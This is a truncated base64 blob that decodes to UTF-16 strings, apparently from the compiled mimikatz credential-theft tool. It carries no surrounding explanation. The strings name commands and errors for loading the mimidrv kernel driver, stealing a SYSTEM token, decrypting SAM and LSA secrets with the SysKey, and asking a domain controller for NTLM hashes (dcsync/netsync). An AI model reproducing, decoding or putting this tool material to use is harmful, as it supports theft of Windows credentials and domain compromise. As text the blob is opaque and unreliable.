AGUAbgB0AF8AYwBsAGUAYQByACAAOwAgAE8AcABlAG4ARQB2AGUAbgB0AEwAbwBnACAAKAAwAHgAJQAwADgAeAApAAoAAABhAHAAcABoAG8AcwB0AAAAaQBpAHMAAABJAEkAUwAgAFgATQBMACAAQwBvAG4AZgBpAGcAIABtAG8AZAB1AGwAZQAAAC8ALwBjAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuAC8AcwB5AHMAdABlAG0ALgBhAHAAcABsAGkAYwBhAHQAaQBvAG4ASABvAHMAdAAvAGEAcABwAGwAaQBjAGEAdABpAG8AbgBQAG8AbwBsAHMALwBhAGQAZAAAAC8ALwBjAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuAC8AcwB5AHMAdABlAG0ALgBhAHAAcABsAGkAYwBhAHQAaQBvAG4ASABvAHMAdAAvAHMAaQB0AGUAcwAvAHMAaQB0AGUAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBpAGkAcwBfAGEAcABwAGgAbwBzAHQAIAA7ACAATQBpAHMAcwBpAG4AZwAgAC8AaQBuADoAZgBpAGwAZQBuAGEAbQBlACAAKABhAHAAcABsAGkAYwBhAHQAaQBvAG4ASABvAHMAdAAuAGMAbwBuAGYAaQBnACkACgAAAAoAKgAgAEEAcABwAGwAaQBjAGEAdABpAG8AbgBQAG8AbwBsADoAIAAnACUAcwAnAAoAAABwAHIAbwBjAGUAcwBzAE0AbwBkAGUAbAAAAAAAdQBzAGUAcgBOAGEAbQBlAAAAAAAgACAAVQBzAGUAcgBuAGEAbQBlADoAIAAlAHMACgAAACAAIABQAGEAcwBzAHcAbwByAGQAOgAgACUAcwAKAAAACgAqACAAUwBpAHQAZQA6ACAAJwAlAHMAJwAKAAAAAABhAHAAcABsAGkAYwBhAHQAaQBvAG4AAABwAGEAdABoAAAAAAAgACAAPgAgAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAFAAYQB0AGgAOgAgACUAcwAKAAAAdgBpAHIAdAB1AGEAbABEAGkAcgBlAGMAdABvAHIAeQAAAAAAAAAAACAAIAAgACAALQAgAFYAaQByAHQAdQBhAGwARABpAHIAZQBjAHQAbwByAHkAIABQAGEAdABoADoAIAAlAHMAIAAoACAAAAAAAHAAaAB5AHMAaQBjAGEAbABQAGEAdABoAAAAAAAgACkACgAAACAAIAAgACAAIAAgAFUAcwBlAHIAbgBhAG0AZQA6ACAAJQBzAAoAAAAgACAAIAAgACAAIABQAGEAcwBzAHcAbwByAGQAOgAgACUAcwAKAAAAWwBlAG4AYwA6AAAAOgBlAG4AYwBdAAAAAAAAACAAIAB8ACAAUAByAG8AdgBpAGQAZQByACAAIAA6ACAAJQBzAAoAIAAgAHwAIABEAGEAdABhACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAALwAvAGMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4ALwBjAG8AbgBmAGkAZwBQAHIAbwB0AGUAYwB0AGUAZABEAGEAdABhAC8AcAByAG8AdgBpAGQAZQByAHMALwBhAGQAZAAAAHQAeQBwAGUAAAAAAE0AaQBjAHIAbwBzAG8AZgB0AC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAEgAbwBzAHQALgBBAGUAcwBQAHIAbwB0AGUAYwB0AGUAZABDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuAFAAcgBvAHYAaQBkAGUAcgAAAGsAZQB5AEMAbwBuAHQAYQBpAG4AZQByAE4AYQBtAGUAAAAAACAAIAB8ACAASwBlAHkATgBhAG0AZQAgACAAIAA6ACAAJQBzAAoAAABzAGUAcwBzAGkAbwBuAEsAZQB5AAAAAAB1AHMAZQBNAGEAYwBoAGkAbgBlAEMAbwBuAHQAYQBpAG4AZQByAAAAdAByAHUAZQAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBpAGkAcwBfAGEAcABwAGgAbwBzAHQAXwBwAHIAbwB2AGkAZABlAHIAIAA7ACAAdAB5AHAAZQAgAGkAcwAgAG4AbwB0ACAAcwB1AHAAcABvAHIAdABlAGQAIAAoACUAcwApAAoAAABsAGkAdgBlAAAAAAAgACAAfAAgAEwAaQB2AGUAIABLAGUAeQAgACAAOgAgACUAcwAgAC0AIAAlAHMAIAA6ACAAAAAAACAAIAB8ACAAUABWAEsAIABmAGkAbABlACAAIAA6ACAAJQBzACAALQAgACcAJQBzACcAIAA6ACAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AaQBpAHMAXwBhAHAAcABoAG8AcwB0AF8AcAByAG8AdgBpAGQAZQByAF8AZABlAGMAcgB5AHAAdAAgADsAIABDAHIAeQBwAHQASQBtAHAAbwByAHQASwBlAHkAIAAoAFIAUwBBACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAIAAgAHwAIABQAGEAcwBzAHcAbwByAGQAIAAgADoAIAAlAHMACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AaQBpAHMAXwBhAHAAcABoAG8AcwB0AF8AcAByAG8AdgBpAGQAZQByAF8AZABlAGMAcgB5AHAAdAAgADsAIABDAHIAeQBwAHQARABlAGMAcgB5AHAAdAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGkAaQBzAF8AYQBwAHAAaABvAHMAdABfAHAAcgBvAHYAaQBkAGUAcgBfAGQAZQBjAHIAeQBwAHQAIAA7ACAAQwByAHkAcAB0AEkAbQBwAG8AcgB0AEsAZQB5ACAAKABzAGUAcwBzAGkAbwBuACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBpAGkAcwBfAGEAcABwAGgAbwBzAHQAXwBwAHIAbwB2AGkAZABlAHIAXwBkAGUAYwByAHkAcAB0ACAAOwAgAEMAcgB5AHAAdABBAGMAcQB1AGkAcgBlAEMAbwBuAHQAZQB4AHQAIAAoADAAeAAlADAAOAB4ACkACgAAACsAAABJAG4AcwB0AGEAbABsACAAYQBuAGQALwBvAHIAIABzAHQAYQByAHQAIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgACgAbQBpAG0AaQBkAHIAdgApAAAAAAAtAAAAAAAAAFIAZQBtAG8AdgBlACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIAAoAG0AaQBtAGkAZAByAHYAKQAAAAAAcABpAG4AZwAAAAAAUABpAG4AZwAgAHQAaABlACAAZAByAGkAdgBlAHIAAABiAHMAbwBkAAAAAABCAFMATwBEACAAIQAAAAAAcAByAG8AYwBlAHMAcwAAAEwAaQBzAHQAIABwAHIAbwBjAGUAcwBzAAAAAABwAHIAbwBjAGUAcwBzAFAAcgBvAHQAZQBjAHQAAAAAAFAAcgBvAHQAZQBjAHQAIABwAHIAbwBjAGUAcwBzAAAAcAByAG8AYwBlAHMAcwBUAG8AawBlAG4AAAAAAEQAdQBwAGwAaQBjAGEAdABlACAAcAByAG8AYwBlAHMAcwAgAHQAbwBrAGUAbgAAAHAAcgBvAGMAZQBzAHMAUAByAGkAdgBpAGwAZQBnAGUAAAAAAFMAZQB0ACAAYQBsAGwAIABwAHIAaQB2AGkAbABlAGcAZQAgAG8AbgAgAHAAcgBvAGMAZQBzAHMAAAAAAG0AbwBkAHUAbABlAHMAAABMAGkAcwB0ACAAbQBvAGQAdQBsAGUAcwAAAAAAcwBzAGQAdAAAAAAATABpAHMAdAAgAFMAUwBEAFQAAABuAG8AdABpAGYAUAByAG8AYwBlAHMAcwAAAAAATABpAHMAdAAgAHAAcgBvAGMAZQBzAHMAIABuAG8AdABpAGYAeQAgAGMAYQBsAGwAYgBhAGMAawBzAAAAbgBvAHQAaQBmAFQAaAByAGUAYQBkAAAATABpAHMAdAAgAHQAaAByAGUAYQBkACAAbgBvAHQAaQBmAHkAIABjAGEAbABsAGIAYQBjAGsAcwAAAAAAbgBvAHQAaQBmAEkAbQBhAGcAZQAAAAAATABpAHMAdAAgAGkAbQBhAGcAZQAgAG4AbwB0AGkAZgB5ACAAYwBhAGwAbABiAGEAYwBrAHMAAABuAG8AdABpAGYAUgBlAGcAAAAAAEwAaQBzAHQAIAByAGUAZwBpAHMAdAByAHkAIABuAG8AdABpAGYAeQAgAGMAYQBsAGwAYgBhAGMAawBzAAAAAABuAG8AdABpAGYATwBiAGoAZQBjAHQAAABMAGkAcwB0ACAAbwBiAGoAZQBjAHQAIABuAG8AdABpAGYAeQAgAGMAYQBsAGwAYgBhAGMAawBzAAAAAABmAGkAbAB0AGUAcgBzAAAATABpAHMAdAAgAEYAUwAgAGYAaQBsAHQAZQByAHMAAABtAGkAbgBpAGYAaQBsAHQAZQByAHMAAABMAGkAcwB0ACAAbQBpAG4AaQBmAGkAbAB0AGUAcgBzAAAAAABzAHkAcwBlAG4AdgBzAGUAdAAAAAAAAABTAHkAcwB0AGUAbQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAFYAYQByAGkAYQBiAGwAZQAgAFMAZQB0AAAAcwB5AHMAZQBuAHYAZABlAGwAAAAAAAAAUwB5AHMAdABlAG0AIABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAIABWAGEAcgBpAGEAYgBsAGUAIABEAGUAbABlAHQAZQAAAAAAbQBpAG0AaQBkAHIAdgAuAHMAeQBzAAAAbQBpAG0AaQBkAHIAdgAAAFsAKwBdACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIABhAGwAcgBlAGEAZAB5ACAAcgBlAGcAaQBzAHQAZQByAGUAZAAKAAAAWwAqAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAG4AbwB0ACAAcAByAGUAcwBlAG4AdAAKAAAAAABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgACgAbQBpAG0AaQBkAHIAdgApAAAAWwArAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAHMAdQBjAGMAZQBzAHMAZgB1AGwAbAB5ACAAcgBlAGcAaQBzAHQAZQByAGUAZAAKAAAAAAAAAAAAWwArAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAEEAQwBMACAAdABvACAAZQB2AGUAcgB5AG8AbgBlAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AYQBkAGQAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABXAG8AcgBsAGQAVABvAE0AaQBtAGkAawBhAHQAegAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABDAHIAZQBhAHQAZQBTAGUAcgB2AGkAYwBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwBpAHMARgBpAGwAZQBFAHgAaQBzAHQAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AZwBlAHQAQQBiAHMAbwBsAHUAdABlAFAAYQB0AGgATwBmACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABPAHAAZQBuAFMAZQByAHYAaQBjAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAFsAKwBdACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIABzAHQAYQByAHQAZQBkAAoAAAAAAAAAAABbACoAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAYQBsAHIAZQBhAGQAeQAgAHMAdABhAHIAdABlAGQACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAAUwB0AGEAcgB0AFMAZQByAHYAaQBjAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAATwBwAGUAbgBTAEMATQBhAG4AYQBnAGUAcgAoAGMAcgBlAGEAdABlACkAIAAoADAAeAAlADAAOAB4ACkACgAAAFsAKwBdACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIABzAHQAbwBwAHAAZQBkAAoAAAAAAFsAKgBdACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIABuAG8AdAAgAHIAdQBuAG4AaQBuAGcACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwByAGUAbQBvAHYAZQBfAG0AaQBtAGkAZAByAHYAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AcwB0AG8AcAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABbACsAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAcgBlAG0AbwB2AGUAZAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHIAZQBtAG8AdgBlAF8AbQBpAG0AaQBkAHIAdgAgADsAIABrAHUAbABsAF8AbQBfAHMAZQByAHYAaQBjAGUAXwByAGUAbQBvAHYAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAByAGUAbQBvAHYAZQAAAAAAUAByAG8AYwBlAHMAcwAgADoAIAAlAHMACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBwAHIAbwBjAGUAcwBzAFAAcgBvAHQAZQBjAHQAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAUAByAG8AYwBlAHMAcwBJAGQARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAcABpAGQAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHAAcgBvAGMAZQBzAHMAUAByAG8AdABlAGMAdAAgADsAIABBAHIAZwB1AG0AZQBuAHQAIAAvAHAAcgBvAGMAZQBzAHMAOgBwAHIAbwBnAHIAYQBtAC4AZQB4AGUAIABvAHIAIAAvAHAAaQBkADoAcAByAG8AYwBlAHMAcwBpAGQAIABuAGUAZQBkAGUAZAAKAAAAAAAAAAAAUABJAEQAIAAlAHUAIAAtAD4AIAAlADAAMgB4AC8AJQAwADIAeAAgAFsAJQAxAHgALQAlADEAeAAtACUAMQB4AF0ACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHAAcgBvAGMAZQBzAHMAUAByAG8AdABlAGMAdAAgADsAIABOAG8AIABQAEkARAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHAAcgBvAGMAZQBzAHMAUAByAG8AdABlAGMAdAAgADsAIABQAHIAbwB0AGUAYwB0AGUAZAAgAHAAcgBvAGMAZQBzAHMAIABuAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACAAYgBlAGYAbwByAGUAIABXAGkAbgBkAG8AdwBzACAAVgBpAHMAdABhAAoAAAAAAGYAcgBvAG0AAAAAAHQAbwAAAAAAAAAAAFQAbwBrAGUAbgAgAGYAcgBvAG0AIABwAHIAbwBjAGUAcwBzACAAJQB1ACAAdABvACAAcAByAG8AYwBlAHMAcwAgACUAdQAKAAAAAAAAAAAAIAAqACAAZgByAG8AbQAgADAAIAB3AGkAbABsACAAdABhAGsAZQAgAFMAWQBTAFQARQBNACAAdABvAGsAZQBuAAoAAAAAAAAAIAAqACAAdABvACAAMAAgAHcAaQBsAGwAIAB0AGEAawBlACAAYQBsAGwAIAAnAGMAbQBkACcAIABhAG4AZAAgACcAbQBpAG0AaQBrAGEAdAB6ACcAIABwAHIAbwBjAGUAcwBzAAoAAABLAGUAcgBuAGUAbABfAEwAcwBhAF8AUABwAGwAXwBDAG8AbgBmAGkAZwAAAAAAAAB7ADcANwBmAGEAOQBhAGIAZAAtADAAMwA1ADkALQA0AGQAMwAyAC0AYgBkADYAMAAtADIAOABmADQAZQA3ADgAZgA3ADgANABiAH0AAAAAAGcAdQBpAGQAAAAAADEAAABhAHQAdAByAGkAYgB1AHQAZQBzAAAAAAAwADAAMAAwADAAMAAwADAAAAAAAE4AYQBtAGUAIAAgACAAIAAgACAAIAA6ACAAJQB3AFoACgBWAGUAbgBkAG8AcgAgAEcAVQBJAEQAOgAgAAAAAAAKAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA6ACAAJQAwADgAeAAgACgAAAAAAEwAZQBuAGcAdABoACAAIAAgACAAIAA6ACAAJQB1AAoARABhAHQAYQAgACAAIAAgACAAIAAgADoAIAAAAD4AIABPAEsAIQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHMAeQBzAGUAbgB2AF8AcwBlAHQAIAA7ACAAUgB0AGwARwBVAEkARABGAHIAbwBtAFMAdAByAGkAbgBnADoAIAAwAHgAJQAwADgAeAAKAAAAKQAKAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AcwB5AHMAZQBuAHYAXwBkAGUAbAAgADsAIABSAHQAbABHAFUASQBEAEYAcgBvAG0AUwB0AHIAaQBuAGcAOgAgADAAeAAlADAAOAB4AAoAAABzAGEAbQAAAEcAZQB0ACAAdABoAGUAIABTAHkAcwBLAGUAeQAgAHQAbwAgAGQAZQBjAHIAeQBwAHQAIABTAEEATQAgAGUAbgB0AHIAaQBlAHMAIAAoAGYAcgBvAG0AIAByAGUAZwBpAHMAdAByAHkAIABvAHIAIABoAGkAdgBlAHMAKQAAAAAAcwBlAGMAcgBlAHQAcwAAAEcAZQB0ACAAdABoAGUAIABTAHkAcwBLAGUAeQAgAHQAbwAgAGQAZQBjAHIAeQBwAHQAIABTAEUAQwBSAEUAVABTACAAZQBuAHQAcgBpAGUAcwAgACgAZgByAG8AbQAgAHIAZQBnAGkAcwB0AHIAeQAgAG8AcgAgAGgAaQB2AGUAcwApAAAAAABHAGUAdAAgAHQAaABlACAAUwB5AHMASwBlAHkAIAB0AG8AIABkAGUAYwByAHkAcAB0ACAATgBMACQASwBNACAAdABoAGUAbgAgAE0AUwBDAGEAYwBoAGUAKAB2ADIAKQAgACgAZgByAG8AbQAgAHIAZQBnAGkAcwB0AHIAeQAgAG8AcgAgAGgAaQB2AGUAcwApAAAAbABzAGEAAAAAAAAAQQBzAGsAIABMAFMAQQAgAFMAZQByAHYAZQByACAAdABvACAAcgBlAHQAcgBpAGUAdgBlACAAUwBBAE0ALwBBAEQAIABlAG4AdAByAGkAZQBzACAAKABuAG8AcgBtAGEAbAAsACAAcABhAHQAYwBoACAAbwBuACAAdABoAGUAIABmAGwAeQAgAG8AcgAgAGkAbgBqAGUAYwB0ACkAAAAAAHQAcgB1AHMAdAAAAAAAAABBAHMAawAgAEwAUwBBACAAUwBlAHIAdgBlAHIAIAB0AG8AIAByAGUAdAByAGkAZQB2AGUAIABUAHIAdQBzAHQAIABBAHUAdABoACAASQBuAGYAbwByAG0AYQB0AGkAbwBuACAAKABuAG8AcgBtAGEAbAAgAG8AcgAgAHAAYQB0AGMAaAAgAG8AbgAgAHQAaABlACAAZgBsAHkAKQAAAAAAYgBhAGMAawB1AHAAawBlAHkAcwAAAAAAcgBwAGQAYQB0AGEAAAAAAGQAYwBzAHkAbgBjAAAAAABBAHMAawAgAGEAIABEAEMAIAB0AG8AIABzAHkAbgBjAGgAcgBvAG4AaQB6AGUAIABhAG4AIABvAGIAagBlAGMAdAAAAG4AZQB0AHMAeQBuAGMAAAAAAAAAQQBzAGsAIABhACAARABDACAAdABvACAAcwBlAG4AZAAgAGMAdQByAHIAZQBuAHQAIABhAG4AZAAgAHAAcgBlAHYAaQBvAHUAcwAgAE4AVABMAE0AIABoAGEAcwBoACAAbwBmACAARABDAC8AUwBSAFYALwBXAEsAUwAAAGwAcwBhAGQAdQBtAHAAAABMAHMAYQBEAHUAbQBwACAAbQBvAGQAdQBsAGUAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGEAbQAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKABTAEEATQAgAGgAaQB2AGUAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGEAbQAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKABTAFkAUwBUAEUATQAgAGgAaQB2AGUAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAUwBZAFMAVABFAE0AAAAAAFMAQQBNAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAYQBtACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcATwBwAGUAbgBLAGUAeQBFAHgAIAAoAFMAQQBNACkAIAAoADAAeAAlADAAOAB4ACkACgAAAD4AIABVAHMAZQByACAAYwBhAGMAaABlACAAcgBlAHAAbABhAGMAZQAgAG0AbwBkAGUAIAAhAAoAAAAAACAAIAAqACAAdQBzAGUAcgAgACAAIAAgACAAOgAgACUAcwAKAAAAAABuAHQAbABtAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGUAYwByAGUAdABzAE8AcgBDAGEAYwBoAGUAIAA7ACAAbgB0AGwAbQAgAGgAYQBzAGgAIABsAGUAbgBnAHQAaAAgAG0AdQBzAHQAIABiAGUAIAAzADIAIAAoADEANgAgAGIAeQB0AGUAcwApACAALQAgAHcAaQBsAGwAIAB1AHMAZQAgAGQAZQBmAGEAdQBsAHQAIABwAGEAcwBzAHcAbwByAGQALgAuAC4ACgAAAAAAIAAgACoAIABwAGEAcwBzAHcAbwByAGQAIAA6ACAAJQBzAAoAAAAAACAAIAAqACAAbgB0AGwAbQAgACAAIAAgACAAOgAgAAAAcwBlAGMAdQByAGkAdAB5AAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGUAYwByAGUAdABzAE8AcgBDAGEAYwBoAGUAIAA7ACAAQwByAGUAYQB0AGUARgBpAGwAZQAgACgAUwBFAEMAVQBSAEkAVABZACAAaABpAHYAZQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAHIAZQB0AHMATwByAEMAYQBjAGgAZQAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKABTAFkAUwBUAEUATQAgAGgAaQB2AGUAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABTAEUAQwBVAFIASQBUAFkAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAHIAZQB0AHMATwByAEMAYQBjAGgAZQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAKABTAEUAQwBVAFIASQBUAFkAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAQwB1AHIAcgBlAG4AdAAAAEQAZQBmAGEAdQBsAHQAAABDAG8AbgB0AHIAbwBsAFMAZQB0ADAAMAAwAAAAUwBlAGwAZQBjAHQAAAAAACUAMAAzAHUAAAAAAEoARAAAAAAAUwBrAGUAdwAxAAAARwBCAEcAAABEAGEAdABhAAAAAAAlAHgAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFMAeQBzAGsAZQB5ACAAOwAgAEwAUwBBACAASwBlAHkAIABDAGwAYQBzAHMAIAByAGUAYQBkACAAZQByAHIAbwByAAoAAAAAAEQAbwBtAGEAaQBuACAAOgAgAAAAQwBvAG0AcAB1AHQAZQByAE4AYQBtAGUAAAAAAEMAbwBuAHQAcgBvAGwAXABDAG8AbQBwAHUAdABlAHIATgBhAG0AZQBcAEMAbwBtAHAAdQB0AGUAcgBOAGEAbQBlAAAAJQBzAAoAAABTAHkAcwBLAGUAeQAgADoAIAAAAEMAbwBuAHQAcgBvAGwAXABMAFMAQQAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AEMAbwBtAHAAdQB0AGUAcgBBAG4AZABTAHkAcwBrAGUAeQAgADsAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABTAHkAcwBrAGUAeQAgAEsATwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAQwBvAG0AcAB1AHQAZQByAEEAbgBkAFMAeQBzAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcATwBwAGUAbgBLAGUAeQBFAHgAIABMAFMAQQAgAEsATwAKAAAAAABWAAAAUwBBAE0AXABEAG8AbQBhAGkAbgBzAFwAQQBjAGMAbwB1AG4AdAAAAEwAbwBjAGEAbAAgAFMASQBEACAAOgAgAAAAAABVAHMAZQByAHMAAABOAGEAbQBlAHMAAAAKAFIASQBEACAAIAA6ACAAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAVQBzAGUAcgAgADoAIAAlAC4AKgBzAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFUAcwBlAHIAcwBBAG4AZABTAGEAbQBLAGUAeQAgADsAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABTAGEAbQBLAGUAeQAgAEsATwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFUAcwBlAHIAcwBBAG4AZABTAGEAbQBLAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAUwBBAE0AIABBAGMAYwBvAHUAbgB0AHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAATgBUAEwATQAAAAAATABNACAAIAAAAAAAJQBzACAAOgAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQASABhAHMAaAAgADsAIABSAHQAbABFAG4AYwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAUgBDADQAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABIAGEAcwBoACAAOwAgAEgAYQBzAGgAIABzAGkAegBlACAAJQB1ACAAIQA9ACAAJQB1AAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AEgAYQBzAGgAIAA7ACAAVQBuAGsAbgBvAHcAIABTAEEATQBfAEgAQQBTAEgAIAByAGUAdgBpAHMAaQBvAG4AIAAoACUAaAB1ACkAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQASABhAHMAaAAgADsAIABSAHQAbABEAGUAYwByAHkAcAB0AEQARQBTADIAYgBsAG8AYwBrAHMAMQBEAFcATwBSAEQAAAAKAFMAQQBNAEsAZQB5ACAAOgAgAAAAAABGAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAUwBhAG0ASwBlAHkAIAA7ACAAUgB0AGwARQBuAGMAcgB5AHAAdABEAGUAYwByAHkAcAB0AFIAQwA0ACAASwBPAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAUwBhAG0ASwBlAHkAIAA7ACAAVQBuAGsAbgBvAHcAIABDAGwAYQBzAHMAaQBjACAAUwB0AHIAdQBjAHQAIABLAGUAeQAgAHIAZQB2AGkAcwBpAG8AbgAgACgAJQB1ACkAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABTAGEAbQBLAGUAeQAgADsAIABVAG4AawBuAG8AdwAgAFMAdAByAHUAYwB0ACAASwBlAHkAIAByA